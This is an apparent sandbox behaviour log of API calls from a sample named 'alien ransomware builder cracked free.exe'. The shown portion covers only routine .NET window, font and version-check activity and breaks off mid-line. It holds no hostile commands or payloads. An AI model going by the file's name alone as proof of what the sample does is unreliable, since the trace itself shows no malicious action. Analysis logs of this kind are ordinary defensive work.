# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Feb 5 2020 10:35:20 # Log Creation Date: 10.02.2020 10:00:59.035 Process: id = "1" image_name = "alien ransomware builder cracked free.exe" filename = "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe" page_root = "0x6c408000" os_pid = "0x13f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7d0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x13fc [0042.946] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0043.613] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefe2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0043.622] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0043.625] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0xefe120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0043.630] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0xefe310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0043.630] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0xefe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0044.160] GetVersionExW (in: lpVersionInformation=0xefe270*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xefe270*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0044.274] GetVersionExW (in: lpVersionInformation=0xefe270*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xefe270*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0046.511] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc151 [0046.511] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc199 [0046.791] GetVersionExW (in: lpVersionInformation=0xefe190*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xefe190*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0046.795] GetCurrentProcess () returned 0xffffffffffffffff [0046.797] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xefe228 | out: TokenHandle=0xefe228*=0x288) returned 1 [0046.816] GetCurrentProcess () returned 0xffffffffffffffff [0046.817] GetCurrentThread () returned 0xfffffffffffffffe [0046.817] GetCurrentProcess () returned 0xffffffffffffffff [0046.820] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xefe160, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xefe160*=0x28c) returned 1 [0046.824] GetCurrentThreadId () returned 0x13fc [0046.871] GetSystemMetrics (nIndex=75) returned 1 [0046.977] lstrlenW (lpString="䅁") returned 1 [0046.982] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7ffc38450000 [0046.984] GetACP () returned 0x4e4 [0047.009] CoTaskMemAlloc (cb=0x10) returned 0x107f7e0 [0047.009] GetProcAddress (hModule=0x7ffc38450000, lpProcName="DefWindowProcW") returned 0x7ffc38b05090 [0047.010] CoTaskMemFree (pv=0x107f7e0) [0047.014] GetStockObject (i=5) returned 0x900015 [0047.016] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0047.018] CoTaskMemAlloc (cb=0x4c) returned 0x1068e30 [0047.018] RegisterClassW (lpWndClass=0xefde50) returned 0xc198 [0047.018] CoTaskMemFree (pv=0x1068e30) [0047.018] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0047.019] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffffffffffd, hMenu=0x0, hInstance=0xb70000, lpParam=0x0) returned 0x502b0 [0047.023] SetWindowLongPtrW (hWnd=0x502b0, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x1220a0c [0047.028] GetWindowLongPtrW (hWnd=0x502b0, nIndex=-4) returned 0x7ffc38b05090 [0047.034] lstrlenW (lpString="䅁") returned 1 [0047.037] GetVersionExW (in: lpVersionInformation=0xefbf50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xefbf50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0047.043] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0xefd008 | out: phkResult=0xefd008*=0x298) returned 0x0 [0047.048] RegQueryValueExW (in: hKey=0x298, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0xefcf8c, lpData=0x0, lpcbData=0xefcf88*=0x0 | out: lpType=0xefcf8c*=0x0, lpData=0x0, lpcbData=0xefcf88*=0x0) returned 0x2 [0047.049] RegQueryValueExW (in: hKey=0x298, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0xefcf8c, lpData=0x0, lpcbData=0xefcf88*=0x0 | out: lpType=0xefcf8c*=0x0, lpData=0x0, lpcbData=0xefcf88*=0x0) returned 0x2 [0047.054] RegCloseKey (hKey=0x298) returned 0x0 [0047.057] SetWindowLongPtrW (hWnd=0x502b0, nIndex=-4, dwNewLong=0x1220a5c) returned 0x7ffc38b05090 [0047.057] GetWindowLongPtrW (hWnd=0x502b0, nIndex=-4) returned 0x1220a5c [0047.057] GetWindowLongPtrW (hWnd=0x502b0, nIndex=-16) returned 0x6c10000 [0047.061] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc19b [0047.062] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502b0, Msg=0x24, wParam=0x0, lParam=0xefd850) returned 0x0 [0047.063] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc19c [0047.063] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502b0, Msg=0x81, wParam=0x0, lParam=0xefd7d0) returned 0x1 [0047.063] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502b0, Msg=0x83, wParam=0x0, lParam=0xefd870) returned 0x0 [0047.231] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502b0, Msg=0x1, wParam=0x0, lParam=0xefd7d0) returned 0x0 [0047.235] GetClientRect (in: hWnd=0x502b0, lpRect=0xefcf80 | out: lpRect=0xefcf80) returned 1 [0047.236] GetWindowRect (in: hWnd=0x502b0, lpRect=0xefcf80 | out: lpRect=0xefcf80) returned 1 [0047.246] GetParent (hWnd=0x502b0) returned 0x0 [0047.413] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0xefe5b0, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x64 [0047.427] IsAppThemed () returned 0x1 [0047.431] CoTaskMemAlloc (cb=0xca) returned 0x106e500 [0047.431] CreateActCtxA (pActCtx=0xefea48) returned 0x1063cb8 [0047.531] CoTaskMemFree (pv=0x106e500) [0048.201] AdjustWindowRectEx (in: lpRect=0xefdfa0, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0xefdfa0) returned 1 [0048.382] GetStockObject (i=5) returned 0x900015 [0048.385] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0048.386] CoTaskMemAlloc (cb=0x4c) returned 0x1069310 [0048.386] RegisterClassW (lpWndClass=0xefdd40) returned 0xc19d [0048.386] CoTaskMemFree (pv=0x1069310) [0048.386] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0048.386] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.0.app.0.378734a", lpWindowName="TimerNativeWindow", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffffffffffd, hMenu=0x0, hInstance=0xb70000, lpParam=0x0) returned 0x302c0 [0048.386] SetWindowLongPtrW (hWnd=0x302c0, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x1220aac [0048.387] GetWindowLongPtrW (hWnd=0x302c0, nIndex=-4) returned 0x7ffc38b05090 [0048.387] SetWindowLongPtrW (hWnd=0x302c0, nIndex=-4, dwNewLong=0x1220afc) returned 0x7ffc38b05090 [0048.387] GetWindowLongPtrW (hWnd=0x302c0, nIndex=-4) returned 0x1220afc [0048.387] GetWindowLongPtrW (hWnd=0x302c0, nIndex=-16) returned 0x4c00000 [0048.389] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x24, wParam=0x0, lParam=0xefd740) returned 0x0 [0048.389] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x81, wParam=0x0, lParam=0xefd6c0) returned 0x1 [0048.389] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x83, wParam=0x0, lParam=0xefd760) returned 0x0 [0048.390] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x1, wParam=0x0, lParam=0xefd690) returned 0x0 [0048.391] SetTimer (hWnd=0x302c0, nIDEvent=0x1, uElapse=0x64, lpTimerFunc=0x0) returned 0x1 [0048.395] GetWindowThreadProcessId (in: hWnd=0x302c0, lpdwProcessId=0xefdfa0 | out: lpdwProcessId=0xefdfa0) returned 0x13fc [0048.395] GetCurrentThreadId () returned 0x13fc [0048.396] IsWindow (hWnd=0x302c0) returned 1 [0048.397] KillTimer (hWnd=0x302c0, uIDEvent=0x1) returned 1 [0048.397] SetTimer (hWnd=0x302c0, nIDEvent=0x2, uElapse=0x1, lpTimerFunc=0x0) returned 0x2 [0048.430] AdjustWindowRectEx (in: lpRect=0xefe040, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefe040) returned 1 [0048.433] GetSystemMetrics (nIndex=59) returned 1460 [0048.433] GetSystemMetrics (nIndex=60) returned 920 [0048.433] GetSystemMetrics (nIndex=34) returned 136 [0048.433] GetSystemMetrics (nIndex=35) returned 39 [0048.436] AdjustWindowRectEx (in: lpRect=0xefdcc0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdcc0) returned 1 [0048.446] AdjustWindowRectEx (in: lpRect=0xefdde0, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdde0) returned 1 [0048.446] AdjustWindowRectEx (in: lpRect=0xefdfb0, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdfb0) returned 1 [0048.446] GetSystemMetrics (nIndex=59) returned 1460 [0048.446] GetSystemMetrics (nIndex=60) returned 920 [0048.446] AdjustWindowRectEx (in: lpRect=0xefda60, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefda60) returned 1 [0048.446] AdjustWindowRectEx (in: lpRect=0xefdc30, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdc30) returned 1 [0048.455] CreateCompatibleDC (hdc=0x0) returned 0x38010653 [0048.465] GetSystemDefaultLCID () returned 0x409 [0048.467] GetStockObject (i=17) returned 0xa01c1 [0048.473] GetObjectW (in: h=0xa01c1, c=92, pv=0xefdb50 | out: pv=0xefdb50) returned 92 [0048.475] GetDC (hWnd=0x0) returned 0x60100ce [0048.497] GetCurrentProcessId () returned 0x13f8 [0048.500] FindAtomW (lpString="GDI+Atom_5112_1") returned 0x0 [0048.502] AddAtomW (lpString="GDI+Atom_5112_1") returned 0xc000 [0048.518] GdiplusStartup (in: token=0xefca98, input=0xefcab0, output=0xefca88 | out: token=0xefca98, output=0xefca88) returned 0x0 [0048.526] GdipCreateFontFromLogfontW (hdc=0x60100ce, logfont=0x1072ab0, font=0xefdb68) returned 0x0 [0048.879] GdipGetFontUnit (font=0x1b8834f0, unit=0xefda70) returned 0x0 [0048.881] GdipGetFontSize (font=0x1b8834f0, size=0xefda70) returned 0x0 [0048.882] GdipGetFontStyle (font=0x1b8834f0, style=0xefda70) returned 0x0 [0048.882] GdipGetFamily (font=0x1b8834f0, family=0xefda70) returned 0x0 [0048.889] GdipGetFontSize (font=0x1b8834f0, size=0xefd9d0) returned 0x0 [0048.890] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0048.894] GetDC (hWnd=0x0) returned 0x60100ce [0048.906] GdipCreateFromHDC (hdc=0x60100ce, graphics=0xefdb30) returned 0x0 [0048.918] GdipGetDpiY (graphics=0x1bb21520, dpi=0x2ec1830) returned 0x0 [0048.921] GdipGetFontHeight (font=0x1b8834f0, graphics=0x1bb21520, height=0xefdb00) returned 0x0 [0048.949] GdipGetEmHeight (family=0x1b88aa80, style=0, EmHeight=0xefdb20) returned 0x0 [0048.951] GdipGetLineSpacing (family=0x1b88aa80, style=0, LineSpacing=0xefdb20) returned 0x0 [0048.957] FindAtomW (lpString="GDI+Atom_5112_1") returned 0xc000 [0048.958] GdipDeleteGraphics (graphics=0x1bb21520) returned 0x0 [0048.958] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0048.964] GdipCreateFont (fontFamily=0x1b88aa80, emSize=0x0, style=0, unit=0x3, font=0xefdbc0) returned 0x0 [0048.964] GdipGetFontSize (font=0x1b88ebe0, size=0xefdc50) returned 0x0 [0048.966] FindAtomW (lpString="GDI+Atom_5112_1") returned 0xc000 [0048.967] GdipDeleteFont (font=0x1b8834f0) returned 0x0 [0048.971] GetDC (hWnd=0x0) returned 0x60100ce [0048.971] GdipCreateFromHDC (hdc=0x60100ce, graphics=0xefdbf0) returned 0x0 [0048.972] GdipGetLogFontW (font=0x1b88ebe0, graphics=0x1bb21520, logfontW=0x1072ab0) returned 0x0 [0048.977] FindAtomW (lpString="GDI+Atom_5112_1") returned 0xc000 [0048.977] GdipDeleteGraphics (graphics=0x1bb21520) returned 0x0 [0048.977] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0048.978] CreateFontIndirectW (lplf=0x1072ab0) returned 0x760a0542 [0048.980] SelectObject (hdc=0x38010653, h=0x760a0542) returned 0x8a01c2 [0048.982] GetTextMetricsW (in: hdc=0x38010653, lptm=0xefdd90 | out: lptm=0xefdd90) returned 1 [0048.983] GetTextExtentPoint32W (in: hdc=0x38010653, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x2ec1c10 | out: psizl=0x2ec1c10) returned 1 [0048.986] SelectObject (hdc=0x38010653, h=0x8a01c2) returned 0x760a0542 [0048.987] DeleteDC (hdc=0x38010653) returned 1 [0048.997] AdjustWindowRectEx (in: lpRect=0xefdbd0, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdbd0) returned 1 [0048.997] AdjustWindowRectEx (in: lpRect=0xefdda0, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdda0) returned 1 [0049.002] AdjustWindowRectEx (in: lpRect=0xefda60, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefda60) returned 1 [0049.002] AdjustWindowRectEx (in: lpRect=0xefdc30, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefdc30) returned 1 [0049.010] GetCurrentActCtx (in: lphActCtx=0xefeab0 | out: lphActCtx=0xefeab0*=0x0) returned 1 [0049.010] ActivateActCtx (in: hActCtx=0x1063cb8, lpCookie=0xefeaf0 | out: hActCtx=0x1063cb8, lpCookie=0xefeaf0) returned 1 [0049.017] GetCurrentActCtx (in: lphActCtx=0xefe510 | out: lphActCtx=0xefe510*=0x1063cb8) returned 1 [0049.017] AdjustWindowRectEx (in: lpRect=0xefe3c0, dwStyle=0x2010000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0xefe3c0) returned 1 [0049.017] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0049.017] CreateWindowExW (dwExStyle=0x50000, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName="Form1", dwStyle=0x2010000, X=-2147483648, Y=-2147483648, nWidth=10, nHeight=10, hWndParent=0x0, hMenu=0x0, hInstance=0xb70000, lpParam=0x0) returned 0x60150 [0049.017] SetWindowLongPtrW (hWnd=0x60150, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x1220a0c [0049.018] GetWindowLongPtrW (hWnd=0x60150, nIndex=-4) returned 0x7ffc38b05090 [0049.018] SetWindowLongPtrW (hWnd=0x60150, nIndex=-4, dwNewLong=0x1220b4c) returned 0x7ffc38b05090 [0049.018] GetWindowLongPtrW (hWnd=0x60150, nIndex=-4) returned 0x1220b4c [0049.018] GetWindowLongPtrW (hWnd=0x60150, nIndex=-16) returned 0x6c10000 [0049.044] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x81, wParam=0x0, lParam=0xefdb70) returned 0x1 [0049.047] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x83, wParam=0x0, lParam=0xefdc10) returned 0x0 [0049.051] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x1, wParam=0x0, lParam=0xefdb50) returned 0x0 [0049.051] GetClientRect (in: hWnd=0x60150, lpRect=0xefd2c0 | out: lpRect=0xefd2c0) returned 1 [0049.051] GetWindowRect (in: hWnd=0x60150, lpRect=0xefd2c0 | out: lpRect=0xefd2c0) returned 1 [0049.059] SetWindowTextW (hWnd=0x60150, lpString="Form1") returned 1 [0049.059] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0xc, wParam=0x0, lParam=0x2ec0240) returned 0x1 [0049.071] GetProcessWindowStation () returned 0xe8 [0049.073] GetUserObjectInformationA (in: hObj=0xe8, nIndex=1, pvInfo=0x2ec26e8, nLength=0xc, lpnLengthNeeded=0xefcfb0 | out: pvInfo=0x2ec26e8, lpnLengthNeeded=0xefcfb0) returned 1 [0049.075] SetConsoleCtrlHandler (HandlerRoutine=0x1220bdc, Add=1) returned 1 [0049.075] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0049.076] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0049.077] GetClassInfoW (in: hInstance=0xb70000, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWndClass=0x2ec2770 | out: lpWndClass=0x2ec2770) returned 0 [0049.079] CoTaskMemAlloc (cb=0x58) returned 0x1068d10 [0049.079] RegisterClassW (lpWndClass=0xefced0) returned 0xc19f [0049.080] CoTaskMemFree (pv=0x1068d10) [0049.081] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWindowName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xb70000, lpParam=0x0) returned 0x90048 [0049.083] NtdllDefWindowProc_W (hWnd=0x90048, Msg=0x81, wParam=0x0, lParam=0xefc6d0) returned 0x1 [0049.084] NtdllDefWindowProc_W (hWnd=0x90048, Msg=0x83, wParam=0x0, lParam=0xefc780) returned 0x0 [0049.084] NtdllDefWindowProc_W (hWnd=0x90048, Msg=0x1, wParam=0x0, lParam=0xefc670) returned 0x0 [0049.084] NtdllDefWindowProc_W (hWnd=0x90048, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0049.084] NtdllDefWindowProc_W (hWnd=0x90048, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0049.091] GetStartupInfoW (in: lpStartupInfo=0x2ec2d70 | out: lpStartupInfo=0x2ec2d70*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0049.093] GetParent (hWnd=0x60150) returned 0x0 [0049.095] SetWindowLongPtrW (hWnd=0x60150, nIndex=-8, dwNewLong=0x0) returned 0x0 [0049.104] GetSystemMetrics (nIndex=11) returned 32 [0049.104] GetSystemMetrics (nIndex=12) returned 32 [0049.104] GetDC (hWnd=0x0) returned 0x60100ce [0049.104] GetDeviceCaps (hdc=0x60100ce, index=12) returned 32 [0049.104] GetDeviceCaps (hdc=0x60100ce, index=14) returned 1 [0049.104] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0049.107] CreateIconFromResourceEx (presbits=0x2ec5858, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xa0225 [0049.108] GetSystemMetrics (nIndex=49) returned 16 [0049.108] GetSystemMetrics (nIndex=50) returned 16 [0049.110] CreateIconFromResourceEx (presbits=0x2ec6958, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x60229 [0049.115] SendMessageW (hWnd=0x60150, Msg=0x80, wParam=0x0, lParam=0x60229) returned 0x0 [0049.116] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x80, wParam=0x0, lParam=0x60229) returned 0x0 [0049.117] SendMessageW (hWnd=0x60150, Msg=0x80, wParam=0x1, lParam=0xa0225) returned 0x0 [0049.117] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x80, wParam=0x1, lParam=0xa0225) returned 0x0 [0049.118] GetSystemMenu (hWnd=0x60150, bRevert=0) returned 0x0 [0049.121] GetWindowPlacement (in: hWnd=0x60150, lpwndpl=0xefe3d0 | out: lpwndpl=0xefe3d0) returned 1 [0049.121] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x0) returned 1 [0049.121] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0049.121] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x0) returned 1 [0049.121] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0049.122] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0049.123] GetClientRect (in: hWnd=0x60150, lpRect=0xefe4f0 | out: lpRect=0xefe4f0) returned 1 [0049.123] GetClientRect (in: hWnd=0x60150, lpRect=0xefe3d0 | out: lpRect=0xefe3d0) returned 1 [0049.123] GetWindowRect (in: hWnd=0x60150, lpRect=0xefe3d0 | out: lpRect=0xefe3d0) returned 1 [0049.125] GetWindowLongPtrW (hWnd=0x60150, nIndex=-16) returned 0x6c10000 [0049.125] GetWindowLongPtrW (hWnd=0x60150, nIndex=-16) returned 0x6c10000 [0049.125] GetWindowLongPtrW (hWnd=0x60150, nIndex=-20) returned 0x50100 [0049.126] SetWindowLongPtrW (hWnd=0x60150, nIndex=-16, dwNewLong=0x2010000) returned 0x6c10000 [0049.126] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x7c, wParam=0xfffffffffffffff0, lParam=0xefe400) returned 0x0 [0049.126] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x7d, wParam=0xfffffffffffffff0, lParam=0xefe400) returned 0x0 [0049.130] SetWindowLongPtrW (hWnd=0x60150, nIndex=-20, dwNewLong=0x50000) returned 0x50000 [0049.130] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0xefe400) returned 0x0 [0049.131] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0xefe400) returned 0x0 [0049.132] SetWindowPos (hWnd=0x60150, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0049.132] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x46, wParam=0x0, lParam=0xefe4b0) returned 0x0 [0049.132] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x83, wParam=0x1, lParam=0xefe480) returned 0x0 [0049.134] GetWindowPlacement (in: hWnd=0x60150, lpwndpl=0xefde70 | out: lpwndpl=0xefde70) returned 1 [0049.134] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x47, wParam=0x0, lParam=0xefe4b0) returned 0x0 [0049.135] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x3, wParam=0x0, lParam=0x820082) returned 0x0 [0049.135] GetClientRect (in: hWnd=0x60150, lpRect=0xefcf10 | out: lpRect=0xefcf10) returned 1 [0049.135] GetWindowRect (in: hWnd=0x60150, lpRect=0xefcf10 | out: lpRect=0xefcf10) returned 1 [0049.136] GetWindowTextLengthW (hWnd=0x60150) returned 5 [0049.136] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0049.136] GetSystemMetrics (nIndex=42) returned 0 [0049.137] CoTaskMemAlloc (cb=0x10) returned 0x1079040 [0049.137] GetWindowTextW (in: hWnd=0x60150, lpString=0x1079040, nMaxCount=6 | out: lpString="Form1") returned 5 [0049.137] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0xd, wParam=0x6, lParam=0x1079040) returned 0x5 [0049.138] CoTaskMemFree (pv=0x1079040) [0049.139] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x5, wParam=0x0, lParam=0x270088) returned 0x0 [0049.140] GetClientRect (in: hWnd=0x60150, lpRect=0xefdc10 | out: lpRect=0xefdc10) returned 1 [0049.140] GetWindowRect (in: hWnd=0x60150, lpRect=0xefdc10 | out: lpRect=0xefdc10) returned 1 [0049.142] RedrawWindow (hWnd=0x60150, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0049.143] GetSystemMenu (hWnd=0x60150, bRevert=0) returned 0x0 [0049.143] GetWindowPlacement (in: hWnd=0x60150, lpwndpl=0xefe3d0 | out: lpwndpl=0xefe3d0) returned 1 [0049.143] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x0) returned 1 [0049.143] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0049.143] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x0) returned 1 [0049.143] EnableMenuItem 